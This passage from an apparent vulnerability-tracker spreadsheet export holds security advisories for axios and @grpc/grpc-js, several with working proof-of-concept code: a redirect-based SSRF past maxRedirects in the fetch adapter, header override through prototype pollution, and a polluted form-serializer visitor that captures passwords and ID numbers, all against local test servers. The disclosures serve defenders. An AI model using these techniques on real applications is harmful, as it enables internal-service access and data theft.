  ...fetchOptions,       // redirect only set here if caller explicitly passes fetchOptions.redirect
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because no `redirect` key is present, the Fetch API default of `redirect: 'follow'` applies, so redirects are handled by the runtime rather than constrained by axios `maxRedirects`. The HTTP adapter, by contrast, delegates to `follow-redirects`, which reads `maxRedirects`, enforces the cap, and strips `Authorization`, `Cookie`, and `Proxy-Authorization` on cross-origin redirects.
The discrepancy between adapters is not documented. The threat model covers credential stripping on redirects (T-R2) and cites `follow-redirects` as the mitigation, but makes no mention that the fetch adapter does not participate in this mitigation. See: https://github.com/axios/axios/blob/master/THREATMODEL.md#t-r2-credential-leakage-on-cross-origin-redirect
The behaviour difference between adapters is summarised below:
| Behaviour                              | HTTP adapter                    | Fetch adapter            |
|----------------------------------------|---------------------------------|--------------------------|
| Reads `config.maxRedirects`            | Yes                             | **No**                   |
| Enforces `maxRedirects: 0`             | Yes -- throws on any redirect   | **No -- follows silently**|
| Strips `Authorization` cross-origin    | Yes (`follow-redirects` &gt;=1.15.8)| Runtime-dependent       |
| Strips `Cookie` cross-origin           | Yes                             | Runtime-dependent        |
### When is the fetch adapter selected?
- **Deno, Bun, Cloudflare Workers:** no Node.js `http` module available; the adapter list falls through to `'fetch'`
- **Explicit config:** `axios.get(url, { adapter: 'fetch' })`
- **Custom adapter list:** `axios.create({ adapter: ['fetch'] })`
## PoC
```js
import http from 'http';
import axios from './index.js';
// Server A: the "trusted" external target, issues open redirects to Server B
const serverA = http.createServer((req, res) =&gt; {
  if (req.url === '/api/data') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/secrets' });
    return res.end();
  }
  if (req.url === '/api/change-config') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/admin/config' });
    return res.end();
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
});
let internalHits = 0;
let internalConfig = {};
// Server B: the "internal" service, should be unreachable from the application
const serverB = http.createServer(async (req, res) =&gt; {
  internalHits++;
  if (req.url === '/internal/secrets') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      secret: 'FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY',
      role:   'arn:aws:iam::000000000000:role/FakeProductionRole',
    }));
  }
  if (req.url === '/internal/admin/config') {
    internalConfig = { compromised: true, source: 'redirect-followed-by-fetch-adapter' };
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      reached: 'state-changing internal admin endpoint',
      changed: true,
      internalConfig,
    }));
  }
  res.writeHead(404);
  res.end();
});
await Promise.all([
  new Promise((resolve, reject) =&gt; { serverA.listen(13801, '127.0.0.1', resolve); serverA.on('error', reject); }),
  new Promise((resolve, reject) =&gt; { serverB.listen(13802, '127.0.0.1', resolve); serverB.on('error', reject); }),
]);
const targetUrl    = 'http://127.0.0.1:13801/api/data';
const changeUrl    = 'http://127.0.0.1:13801/api/change-config';
const internalUrl  = 'http://127.0.0.1:13802/internal/secrets';
const internalCfg  = 'http://127.0.0.1:13802/internal/admin/config';
console.log('Axios maxRedirects bypass via fetch adapter PoC');
console.log(`axios VERSION=${axios.VERSION}`);
console.log(`maxRedirects=0`);
console.log(`Target URL=${targetUrl}`);
console.log(`  redirects to ${internalUrl}`);
console.log(`Change URL=${changeUrl}`);
console.log(`  redirects to ${internalCfg}`);
console.log('');
// CONTROL: HTTP adapter correctly enforces maxRedirects: 0
let httpBlocked = false;
try {
  await axios.get(targetUrl, { maxRedirects: 0, adapter: 'http' });
  console.log('[CONTROL]  HTTP adapter + maxRedirects:0  BUG: should have thrown');
} catch (err) {
  httpBlocked = true;
  console.log(`[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (${err.code ?? err.message})`);
}
console.log(`[CONTROL]  Internal hits after HTTP adapter: ${internalHits}`);
// BYPASS: Fetch adapter silently ignores maxRedirects: 0
let fetchResponse = null;
try {
  fetchResponse = await axios.get(targetUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗');
  console.log('           Response:', JSON.stringify(fetchResponse.data));
} catch (err) {
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  redirect blocked (unexpected):', err.message);
}
console.log(`[BYPASS]   Internal hits after fetch adapter: ${internalHits}`);
// BYPASS: Fetch adapter follows redirect to state-changing internal endpoint
let changedResponse = null;
try {
  changedResponse = await axios.get(changeUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter state change:', JSON.stringify(changedResponse.data));
  console.log(`[BYPASS]   Internal hits after state change: ${internalHits}`);
} catch (err) {
  console.log('[BYPASS]   State change request blocked (unexpected):', err.message);
}
console.log('');
if (httpBlocked &amp;&amp; fetchResponse &amp;&amp; changedResponse) {
  console.log('POC RESULT: fetch adapter followed redirects despite maxRedirects:0,');
  console.log('            reaching internal service and mutating internal state.');
} else if (httpBlocked &amp;&amp; fetchResponse) {
  console.log('POC RESULT: fetch adapter followed redirect despite maxRedirects:0,');
  console.log('            reaching internal service that should have been unreachable.');
} else if (!httpBlocked) {
  console.log('POC RESULT: HTTP adapter did not block redirect -- unexpected, check axios version.');
} else {
  console.log('POC RESULT: fetch adapter blocked redirect -- issue may be fixed.');
}
serverA.close();
serverB.close();
```
Run:
```bash
node poc-max-redirects.mjs
```
Observed:
```text
Axios maxRedirects bypass via fetch adapter PoC
axios VERSION=1.17.0
maxRedirects=0
Target URL=http://127.0.0.1:13801/api/data
  redirects to http://127.0.0.1:13802/internal/secrets
Change URL=http://127.0.0.1:13801/api/change-config
  redirects to http://127.0.0.1:13802/internal/admin/config
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗
           Response: {"secret":"FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY","role":"arn:aws:iam::000000000000:role/FakeProductionRole"}
[BYPASS]   Internal hits after fetch adapter: 1
[BYPASS]   Fetch adapter state change: {"reached":"state-changing internal admin endpoint","changed":true,"internalConfig":{"compromised":true,"source":"redirect-followed-by-fetch-adapter"}}
[BYPASS]   Internal hits after state change: 2
POC RESULT: fetch adapter followed redirects despite maxRedirects:0,
            reaching internal service and mutating internal state.
```
## Control
Axios does correctly enforce `maxRedirects: 0` in the HTTP adapter. The `[CONTROL]` case above confirms this: the same request with `adapter: 'http'` throws rather than following the redirect, and the internal hit counter stays at `0`:
```text
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
```
The issue is not that `maxRedirects` is broken globally. It is enforced correctly for the HTTP adapter. The bypass is specific to the fetch adapter, which never reads the option and passes no `redirect` constraint to the underlying `fetch()` call.
## Impact
This is a redirect enforcement bypass affecting axios applications running in environments where the fetch adapter is active.
The internal admin route in the PoC simulates an affected deployment where a redirected request can reach state-changing internal APIs. The vulnerability is that `maxRedirects: 0` is silently ignored by the fetch adapter; the exact impact depends on what redirect targets are reachable from the runtime.
The impact is environment- and configuration-dependent. It affects axios users who:
- Set `maxRedirects: 0` as a defense against redirect-based SSRF, and
- Run in an environment where the fetch adapter is selected, either by runtime (Deno, Bun, Cloudflare Workers) or by explicit configuration
In these cases, a `302` redirect from the initial target is followed silently by default, unless the caller separately sets `fetchOptions.redirect`. If the redirect target is an internal service, the application returns its response to the caller with no indication that a redirect occurred or that `maxRedirects` was not honoured. The failure is silent: no error is thrown, no warning is logged.
The bypass is not limited to read-only access. As demonstrated by the second bypass case, a redirect to a state-changing internal endpoint succeeds equally. An attacker who can influence the redirect destination, for example through an open redirect on the initial target or a server they control, can reach internal and trigger mutations that the application never intended to issue.
Potentially affected environments include:
- Deno and Bun applications using axios where the fetch adapter is the default.
- Cloudflare Workers using axios, which has no Node.js `http` module.
- Node.js applications that explicitly configure `adapter: 'fetch'` or a custom adapter list that resolves to fetch.
- Any application that conditionally sets `maxRedirects: 0` and runs across multiple environments with different adapter selection.
Internal services reachable via a redirect include cloud instance metadata endpoints (`169.254.169.254`), unauthenticated local services such as Redis or internal admin APIs, and other hosts accessible from the application's network that are not intended to be reachable by the caller. The hit counter in the PoC makes the access concrete: `0` after the HTTP control, `1` after the confidentiality bypass, `2` after the integrity bypass.
This should not be characterised as an unconditional SSRF. The bypass requires either an open redirect on the initial target, or a URL that is itself a redirect. The issue is that `maxRedirects: 0`, which is the intended mitigation for this class of attack, is silently non-functional in the fetch adapter, leaving applications with a false sense of protection.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D605" s="5" t="inlineStr"/>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M605" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q605" s="5" t="inlineStr"/>
      <c r="R605" s="5" t="inlineStr"/>
      <c r="S605" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios fetch adapter requests can be altered by inherited properties on `fetchOptions`. The adapter resolves method, headers, body, signal, and credentials into `resolvedOptions`, creates a `Request`, and then calls `fetch(request, fetchOptions)` instead of `fetch(request, resolvedOptions)`. In runtimes such as Node's undici-backed fetch, inherited `fetchOptions.headers` can override the headers already placed on the `Request`.
Axios does not create the prototype pollution source. This is a read-side gadget that becomes exploitable after same-process prototype pollution.
## Impact
An attacker with a prior prototype-pollution primitive can cause affected fetch-adapter requests to send attacker-controlled headers and drop caller-specified headers. This can affect authorization, cache behavior, metadata-service interactions, or application-specific header-based controls.
The issue is specific to fetch-adapter behavior and does not affect Node HTTP adapter requests.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where the fetch adapter is selected.
- Requests where `fetchOptions` is an object that does not have safe own values for sensitive fetch init fields.
Not affected:
- Node HTTP adapter.
- Requests that do not use the fetch adapter.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/adapters/fetch.js` builds:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
request = isRequestSupported &amp;&amp; new Request(url, resolvedOptions);
let response = await (isRequestSupported
  ? _fetch(request, fetchOptions)
  : _fetch(url, resolvedOptions));
```
The fallback path without `Request` uses `resolvedOptions`, but the `Request` path passes the original `fetchOptions` as the second argument to `fetch()`. That second argument can contain inherited properties from `Object.prototype`.
Local verification on axios `1.18.1` set `Object.prototype.headers = { Authorization: 'Bearer POLLUTED' }` and called the fetch adapter with `headers: { 'X-Good': 'yes' }, fetchOptions: {}`. The loopback server received `Authorization: Bearer POLLUTED` and did not receive `X-Good`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { Authorization: 'Bearer POLLUTED' };
try {
  await axios.get(url, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
} finally {
  delete Object.prototype.headers;
}
```
Expected safe behavior is that the sanitized axios headers remain in force. Current behavior can use the inherited fetch init headers instead.
## Workarounds
Use the Node HTTP adapter for security-sensitive server-side requests until fixed. If the fetch adapter must be used, avoid passing empty `fetchOptions` objects in processes where prototype pollution is possible, and set explicit safe own values for fetch init fields.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hello, I’m not completely sure if this is something you’d consider a security issue, since it depends on prototype pollution happening somewhere else first, but I wanted to report it just in case.
I was testing the fetch adapter with polluted prototype values and found that `Object.prototype.headers` can change the request axios sends.
The issue seems to be in `lib/adapters/fetch.js`. Axios creates a `Request` with the resolved headers/method/body, but then sends it with `fetch(request, fetchOptions)`. With undici, if `fetchOptions` doesn’t have its own headers, an inherited `Object.prototype.headers` value can be used during the final fetch call.
I tested it with this:
```js
import http from 'node:http';
import axios from 'axios';
const server = http.createServer((req, res) =&gt; {
  res.end(JSON.stringify({
    authorization: req.headers.authorization || null,
    xGood: req.headers['x-good'] || null
  }));
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
const { port } = server.address();
Object.prototype.headers = {
  Authorization: 'Bearer POLLUTED'
};
try {
  const res = await axios.get(`http://127.0.0.1:${port}/`, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
  console.log(res.data);
} finally {
  delete Object.prototype.headers;
  server.close();
}
```
The result I get is:
```json
{
  "authorization": "Bearer POLLUTED",
  "xGood": null
}
```
So the polluted Authorization header is sent, and the normal axios header is not.
Changing the fetch call to pass the already resolved options fixes it for me:
```diff
- _fetch(request, fetchOptions)
+ _fetch(request, resolvedOptions)
```
`resolvedOptions` already includes `...fetchOptions`, so custom fetch options should still work, while headers, method, body, and signal stay as clean own values.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D606" s="5" t="inlineStr"/>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M606" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr"/>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios form serialization reads `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob` from an internal options object without own-property guards. When `Object.prototype` has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.
Axios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.
## Impact
The impact depends on which property is polluted and which axios serialization path the application uses.
Polluted `dots`, `indexes`, or `metaTokens` can change field names and cause the receiving service to parse different data than the caller intended. Polluted `maxDepth` can cause nested form submissions to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`, producing request-level or service-level denial of service for affected workflows. Polluted `visitor` can execute as the serializer visitor if an attacker can place a function on `Object.prototype`, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.
## Affected Functionality
Affected:
- `axios.toFormData()`.
- `transformRequest` paths that serialize plain objects to `multipart/form-data`.
- URL-encoded form serialization paths that rely on the same helper.
- `formSerializer` option defaults when the relevant properties are absent as own properties.
Not affected:
- JSON request bodies.
- Requests that do not invoke `toFormData()`.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/helpers/toFormData.js` merges caller options with defaults using `utils.toFlatObject()`. When `options` is `undefined`, `toFlatObject()` returns the default object unchanged:
```js
{
  metaTokens: true,
  dots: false,
  indexes: false
}
```
That default object has `Object.prototype` in its prototype chain. `toFormData()` then reads behavior-affecting values directly:
```js
const metaTokens = options.metaTokens;
const visitor = options.visitor || defaultVisitor;
const dots = options.dots;
const indexes = options.indexes;
const _Blob = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);
const maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;
```
These reads can resolve inherited polluted properties.
Local code review confirmed the direct reads in `v1.18.1`. Tag checks show the option-based form serializer exists in `v0.28.0` and later; `maxDepth` appears in the `1.x` line from the form recursion fix.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.maxDepth = 1;
await axios.post(url, { a: { b: { c: 'value' } } }, {
  headers: { 'Content-Type': 'multipart/form-data' }
});
```
Expected safe behavior is that the default max depth is used unless the caller sets an own `formSerializer.maxDepth`. Current behavior reads the inherited value and can throw `ERR_FORM_DATA_DEPTH_EXCEEDED`.
For serializer alteration, polluting `Object.prototype.dots = true` changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.
## Workarounds
Avoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own `formSerializer` object that sets explicit safe values for all relevant keys, including `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
_axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (`visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, `Blob`) are read from a plain JavaScript object that inherits from `Object.prototype` without `hasOwnProperty` guards. When `Object.prototype` has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior._
_The highest-impact gadget is `visitor`: a polluted function on `Object.prototype.visitor` is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments._
### Details
#### Root Cause
_The attack chain has three steps:_
_**Step 1:  `formSerializer` is read safely, but `undefined` flows through**_
_In `lib/defaults/index.js`, the default `transformRequest` function reads `formSerializer` from config using the `own()` helper, which enforces `hasOwnProp`:_
```js
const formSerializer = own(this, 'formSerializer');
```
_When the user does not explicitly configure `formSerializer`, this correctly returns `undefined`. That `undefined` is then passed as the `options` parameter to `toFormData()`:_
```js
return toFormData(data, _FormData &amp;&amp; new _FormData(), formSerializer);
//                                                     ^^^^^^^^^^^^ undefined
```
_**Step 2: `toFlatObject` returns a plain-object default**_
_Inside `lib/helpers/toFormData.js`, `options` (which is `undefined`) is merged with defaults via `utils.toFlatObject()`:_
```js
options = utils.toFlatObject(
    options,                                    // undefined
    { metaTokens: true, dots: false, indexes: false },  // plain object literal
    false,
    function defined(option, source) {
        return !utils.isUndefined(source[option]);
    }
);
```
_`toFlatObject` has an early-return for null/undefined sources:_
```js
// lib/utils.js:607
if (sourceObj == null) return destObj;
```
_Since `options` is `undefined`, the function returns `destObj` unchanged — the plain object `{ metaTokens: true, dots: false, indexes: false }`. This object's prototype is `Object.prototype`._
_**Step 3: Options are read without `hasOwnProp` guards**_
_The six option properties are read directly from the plain object:_
```js
const metaTokens = options.metaTokens;                                          // line 117
const visitor    = options.visitor || defaultVisitor;                            // line 119
const dots       = options.dots;                                                // line 120
const indexes    = options.indexes;                                             // line 121
const _Blob      = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);       // line 122
const maxDepth   = options.maxDepth === undefined                                // line 123
                     ? DEFAULT_FORM_DATA_MAX_DEPTH
                     : options.maxDepth;
```
_None of these reads use `utils.hasOwnProp()`. Since the `options` object inherits from `Object.prototype`, any property set on `Object.prototype` by a compromised dependency is resolved through the prototype chain._
#### Why the Existing Defenses Didn't Catch This
_axios has extensive prototype pollution defenses. However, those defenses are all focused on the **config** object (created by `mergeConfig`, which returns `Object.create(null)`). The `toFormData` function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited._
### PoC
#### Reproduction Steps
#### Environment
_Any environment with Node.js and npm. Tested on:_
_- Node.js v24.15.0, npm 11.13.0_
_- axios v1.18.1 (latest release at time of writing)_
##### Step 1: Create a fresh project
```bash
mkdir axios-pp-poc
cd axios-pp-poc
npm init -y
npm install axios@1.18.1
```
##### Step 2: Create the PoC file
_Create `poc.mjs` with the following content:_
```js
import axios from 'axios';
import http from 'http';
// Simulate pollution from a compromised transitive dependency
let stolen = [];
Object.prototype.visitor = function(value, key, path, helpers) {
    stolen.push({ key, value });
    return helpers.defaultVisitor.call(this, value, key, path);
};
Object.prototype.maxDepth = 2;
const server = http.createServer((req, res) =&gt; {
    res.writeHead(200);
    res.end('{}');
});
server.listen(0, '127.0.0.1', async () =&gt; {
    const { port } = server.address();
    try {
        // Exfiltration: visitor intercepts all form fields
        await axios.post(`http://127.0.0.1:${port}/`, {
            username: 'john',
            password: 'SuperSecret123!',
            profile: { ssn: '123-45-6789' }
        }, { headers: { 'Content-Type': 'multipart/form-data' } });
        console.log('Stolen:', stolen);
        // Stolen: [
        //   { key: 'username', value: 'john' },
        //   { key: 'password', value: 'SuperSecret123!' },
        //   { key: 'profile',  value: { ssn: '123-45-6789' } },
        //   { key: 'ssn',      value: '123-45-6789' }
        // ]
        // DoS: nested object rejected by polluted maxDepth
        await axios.post(`http://127.0.0.1:${port}/`,
            { a: { b: { c: { d: 'value' } } } },
            { headers: { 'Content-Type': 'multipart/form-data' } }
        );
        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED
        //   "Object is too deeply nested (3 levels). Max depth: 2"
    } finally {
        delete Object.prototype.visitor;
        delete Object.prototype.maxDepth;
        server.close();
    }
});
```
##### Step 3: Run the PoC
```bash
node poc.mjs
```
### Impact
#### 1. Data Exfiltration via `visitor` (Confidentiality: High)
_A polluted `Object.prototype.visitor` function is called as the form data visitor:_
```js
visitor.call(formData, el, key, path, exposedHelpers)
```
_The attacker receives:_
_- **`value`** — the raw value being serialized (passwords, tokens, PII, API keys)_
_- **`key`** — the field name_
_- **`path`** — the full path array (e.g., `['profile', 'address', 'street']`)_
_- **`exposedHelpers`** — internal helpers including `defaultVisitor`, `convertValue`, `isVisitable`_
_By delegating to `helpers.defaultVisitor`, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server._
#### 2. Denial of Service via `maxDepth` (Availability: Low)
_A polluted `Object.prototype.maxDepth` of `1` or `2` causes any moderately nested form data request to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`. Applications that send nested objects as form data (common with APIs that accept `profile[name]`, `address[city]`, etc.) will experience mysterious failures._
#### 3. Data Corruption via `dots`, `indexes`, `metaTokens` (Integrity: Low)
_Polluting these options changes the serialization format of form field names:_
_- **`dots: true`** — changes bracket notation (`user[name]`) to dot notation (`user.name`)_
_- **`indexes: true`** — changes array serialization (`items[]`) to indexed (`items[0]`, `items[1]`)_
_- **`metaTokens: false`** — changes `obj{}` keys to raw json strings_
_The server may misinterpret the submitted form data, leading to silent data corruption._
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D607" s="5" t="inlineStr"/>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M607" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr"/>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>### Impact
If an application method handler crashes, the error message is included in the status message sent to the client. This can leak to the client any sensitive data that may be included in the error message. This impacts anyone using `@grpc/grpc-js` to run servers.
### Patches
This vulnerability is fixed in 1.13.6 and 1.14.5.
### Workarounds
This can be avoided by using a top-level error handler in method handlers to strip out sensitive error information.</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D608" s="5" t="inlineStr"/>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M608" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr"/>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>### Impact
When server credentials are created with the `requireClientCertificate` option set to `false`, `getAuthContext` does not distinguish between authorized and unauthorized certificates in its return value. This can create improper authentication vulnerabilities for `@grpc/grpc-js` users who use the result of `getAuthContext` for authentication.
In particular, `@grpc/grpc-js-xds` can both set the `requireClientCertificate` option to `false` and use the return value of `getAuthContext` for RBAC authentication in some configurations.
### Patches
This vulenrability is fixed in 1.13.6 and 1.14.5.
### Workarounds
`@grpc/grpc-js` users using `getAuthContext` this way can avoid this problem by setting `requireClientCertificate` to `true`. `@grpc/grpc-js-xds` users using RBAC can avoid this by setting the `require_client_certificate` field to `true` in the DownstreamTlsContext in the xDS configuration.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D609" s="5" t="inlineStr"/>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.003</v>
      </c>
